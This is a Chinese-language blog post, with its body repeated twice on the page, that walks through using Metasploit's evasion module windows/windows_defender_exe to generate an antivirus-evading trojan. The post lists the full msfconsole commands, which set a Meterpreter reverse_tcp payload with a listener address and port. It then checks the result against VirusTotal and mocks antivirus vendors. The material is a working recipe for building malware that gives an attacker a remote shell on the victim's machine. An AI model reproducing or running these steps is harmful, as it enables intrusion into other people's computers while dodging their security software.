我的一次免杀操作

Author：逍遥子
发布时间：January 11, 2020
2154views
No comments
1049 words
Categories：全部

5.0中有一个新的模块叫Evasion模块，这个模块可以轻松的创建反杀毒软件的木马，今天我们就来试一试
首先我们启动msfconsole

service postgresql start
msfconsole

查看evasion模块

show evasion

显示模块
使用windows/windows_defender_exe这个模块

use windows/windows_defender_exe

查看要配置的参数

show options

详细信息
就一个文件名参数可以配置

set FILENAME bbskali.exe

生成shell

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.93
set LPORT 4444
exploit

生成shell
注意生成的目录

免杀测试

https://www.virustotal.com/
效果如下：
免杀效果
电脑管家
牛叉的电脑管家垃圾~
这里仅仅对其中的一个模块进行了测试，感觉效果还是可以。毕竟是msf自带的模块。后面的模块，你们自行测试吧！
360安全装逼

版权属于：逍遥子

本文链接：https://blog.bbskali.cn/1675.html

知识共享署名-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 协议进行许可👍
转载时请以超链接形式标明文章原始出处和作者信息

Last modification：January 11th, 2020 at 07:37 pm

© 允许规范转载

正在沿街乞讨中……

Leave a Comment Cancel reply

Comment *

私密评论

Name *

Email *

Site

我的一次免杀操作

逍遥子 • 2020 年 01 月 11 日

5.0中有一个新的模块叫Evasion模块，这个模块可以轻松的创建反杀毒软件的木马，今天我们就来试一试
首先我们启动msfconsole

service postgresql start
msfconsole

查看evasion模块

show evasion

显示模块
使用windows/windows_defender_exe这个模块

use windows/windows_defender_exe

查看要配置的参数

show options

详细信息
就一个文件名参数可以配置

set FILENAME bbskali.exe

生成shell

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.93
set LPORT 4444
exploit

生成shell
注意生成的目录

免杀测试

https://www.virustotal.com/
效果如下：
免杀效果
电脑管家
牛叉的电脑管家垃圾~
这里仅仅对其中的一个模块进行了测试，感觉效果还是可以。毕竟是msf自带的模块。后面的模块，你们自行测试吧！
360安全装逼

版权属于：逍遥子

本文链接：https://blog.bbskali.cn/1675.html

知识共享署名-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 协议进行许可👍
转载时请以超链接形式标明文章原始出处和作者信息